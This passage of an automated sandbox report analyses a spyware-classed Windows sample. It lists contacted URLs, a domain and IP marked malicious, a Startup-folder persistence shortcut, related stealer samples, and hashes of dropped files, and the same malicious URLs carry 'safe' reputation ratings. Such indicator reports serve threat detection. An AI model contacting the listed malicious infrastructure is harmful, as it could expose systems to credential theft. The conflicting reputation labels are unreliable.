                  https://www.handyviewer.com/donate.htmlopenS0%Avira URL Cloudsafe
                  https://digoperonodice3.online/L0%Avira URL Cloudsafe
                  https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D0%Avira URL Cloudsafe
                  https://www.handyviewer.com/openhM0%Avira URL Cloudsafe
                  https://www.handyviewer.com/openhME0%Avira URL Cloudsafe
                  https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay0%Avira URL Cloudsafe
                  https://www.handyviewer.com/contact.htmlopenSV0%Avira URL Cloudsafe
                  https://www.handyviewer.com/donate.htmlopen0%Avira URL Cloudsafe
                  https://digoperonodice3.online/0%Avira URL Cloudsafe
                  https://digoperonodice3.online:4430%Avira URL Cloudsafe
                  https://www.handyviewer.com0%Avira URL Cloudsafe
                  https://www.handyviewer.com/openS0%Avira URL Cloudsafe
                  https://www.handyviewer.com/manual/openU0%Avira URL Cloudsafe
                  https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=0%Avira URL Cloudsafe
                  https://www.handyviewer.com/check-version.php?version=openS0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  digoperonodice3.online
                  172.67.153.243
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3Dtrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabLocaldockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/ac/?q=Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://www.vmware.com/0hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://www.softwareok.com/?Freeware/Find.Same.Images.OK/HistoryLocaldockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                            high
                            http://ocsp.sectigo.com09mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://digoperonodice3.online:443/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4iLocaldockerv3.exe, 00000008.00000003.2112186023.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.softwareok.com/?Freeware/Find.Same.Images.OKLocaldockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                                high
                                https://www.handyviewer.com/openhMEhv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.handyviewer.com/donate.htmlopenS9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.handyviewer.com/openhM9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://www.handyviewer.com/openSV9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-PeayLocaldockerv3.exe, 00000008.00000002.2160661904.0000000000AD3000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.softwareok.de/?Freeware/Find.Same.Images.OKLocaldockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                                      high
                                      https://digoperonodice3.online/Ohio-Vall9~Localdockerv3.exe, 00000008.00000003.1897374947.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1897886861.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1916979579.0000000000528000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.handyviewer.com/contact.htmlopenSV9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://digoperonodice3.online/LLocaldockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                                        high
                                        https://www.handyviewer.com/donate.htmlopen9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.softwareok.dehv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLocaldockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://www.softwareok.de/?Freeware/Find.Same.Images.OK/HistoryLocaldockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                                              high
                                              http://www.softwareok.com/?Download=Find.Same.Images.OKLocaldockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                high
                                                https://digoperonodice3.online/Localdockerv3.exe, 00000008.00000002.2160225088.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sectigo.com/CPS09mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://digoperonodice3.online:443Localdockerv3.exe, 00000008.00000002.2169892760.0000000007F50000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoLocaldockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.softwareok.de/?Download=Find.Same.Images.OKLocaldockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                      high
                                                      http://www.vmware.com/0/hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                              high
                                                              http://www.???.xx/?search=%shv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.symauth.com/cps0(hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.symauth.com/rpa00hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.info-zip.org/hv.exe, 00000002.00000002.1486704045.000000000C77A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.00000000054DB000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.00000000027BB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.handyviewer.com/manual/openU9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.handyviewer.com/openS9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.handyviewer.com/check-version.php?version=openS9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.handyviewer.com9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1450461576.0000000001546000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.surfok.de/Localdockerv3.exe, 00000008.00000000.1734434382.0000000140156000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.softwareok.comhv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    172.67.153.243
                                                                                    digoperonodice3.onlineUnited States
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1581191
                                                                                    Start date and time:2024-12-27 08:14:09 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 9m 11s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:21
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:1
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:9mauyKC3JW.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:ae130c89b7d8c4c9fd06422faeb79fc9.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.spyw.expl.evad.winEXE@20/23@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 33.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 53%
                                                                                    • Number of executed functions: 42
                                                                                    • Number of non-executed functions: 98
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target Localdockerv3.exe, PID 1296 because there are no executed function
                                                                                    • Execution Graph export aborted for target hv.exe, PID 1612 because there are no executed function
                                                                                    • Execution Graph export aborted for target hv.exe, PID 3324 because there are no executed function
                                                                                    • Execution Graph export aborted for target hv.exe, PID 7960 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    TimeTypeDescription
                                                                                    02:15:40API Interceptor3x Sleep call for process: cmd.exe modified
                                                                                    02:15:42API Interceptor24x Sleep call for process: Localdockerv3.exe modified
                                                                                    08:15:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bstask_x64.lnk
                                                                                    No context
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSuUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.71.155
                                                                                    x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.175.134
                                                                                    3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.62.151
                                                                                    installer.batGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    skript.batGet hashmaliciousVidarBrowse
                                                                                    • 162.159.61.3
                                                                                    din.exeGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    lem.exeGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 104.26.13.205
                                                                                    utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 172.67.74.152
                                                                                    0Gs0WEGB1E.dllGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.22.88
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                                                    • 172.67.153.243
                                                                                    installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                    • 172.67.153.243
                                                                                    0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.153.243
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\Localdockerv3.exeATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                      ATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                        upgrade.htaGet hashmaliciousDarkVision RatBrowse
                                                                                          MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                            UolJwovI8c.exeGet hashmaliciousUnknownBrowse
                                                                                              ONHQNHFT.msiGet hashmaliciousUnknownBrowse
                                                                                                es.htaGet hashmaliciousUnknownBrowse
                                                                                                  BkTwXj17DH.exeGet hashmaliciousUnknownBrowse
                                                                                                    TVr2Z822J3.exeGet hashmaliciousUnknownBrowse
                                                                                                      Process:C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5685791
                                                                                                      Entropy (8bit):7.735296092306856
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:fRvTCmITyYdLBTEMwsJDvIdYzQMvCOsG/cbLxf1e:JbdaVTEGcwqO10bLy
                                                                                                      MD5:E3ECD9A2BF9E44E13947243CA501197B
                                                                                                      SHA1:394138DBC559F794B6FB79E6B3CF78D015EB9920
                                                                                                      SHA-256:52A3FD13CE124C07926A84F0D3F73CEDF4F11BD20A2672CC7EAEB2131F7CBD3D
                                                                                                      SHA-512:E2608B2784D0B3209DEDA7EFF902B6C436731E1B802F7A99F43C3B0DE94FF82D6CE6B5F2CBC8E10774869F35E282E8325ECCE510D94E2157CB93C60466CD0098
                                                                                                      Malicious:false
                                                                                                      Preview:[*..Y*..X*..X*..Y*..|*..L...X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..}k.T.k.E}v.m;X.w7L.X.C.`7].X.^.v,..a6_.T*E.v9G.X.^.v,_..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*...E.j1^.e4C.a.R..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*...E.v=K.a.D.p9D.aX*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..}}.J.c.!.g.g*E.k>^.J.~.B*K.a/E.oX*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*.....4v..3j...X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..
                                                                                                      Process:C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5685791
                                                                                                      Entropy (8bit):7.735296057845514
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:qRvTCmITyYdLBTEMwsJDvIdYzQMvCOsG/cbLxf1e:IbdaVTEGcwqO10bLy
                                                                                                      MD5:D0E390AC18F930C652A4FCC2A45C9CA4
                                                                                                      SHA1:7A8DB921C74A384E09FE7C609FF6521108BEE057
                                                                                                      SHA-256:77A469B75D58B5875FB3F207B28558579C9C9E7A3818E01280B890F32D07FF2E
                                                                                                      SHA-512:4E28B50F7788EC2720FAF84E6A024FE13DFBB10F26E2FCE74662F898C3FA2C29191E651266BE1965E1E55395CE47FBDBC4C01CBD879743EE3911EE2F0A488D09
                                                                                                      Malicious:false
                                                                                                      Preview:[*..Y*..X*..X*..Y*..|*..L...X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..}k.T.k.E}v.m;X.w7L.X.C.`7].X.^.v,..a6_.T*E.v9G.X.^.v,_..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*...E.j1^.e4C.a.R..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*...E.v=K.a.D.p9D.aX*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..}}.J.c.!.g.g*E.k>^.J.~.B*K.a/E.oX*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..X*.....4v..3j...X*..X*..X*..X*..X*..X*..X*..X*..X*..X*..
                                                                                                      Process:C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
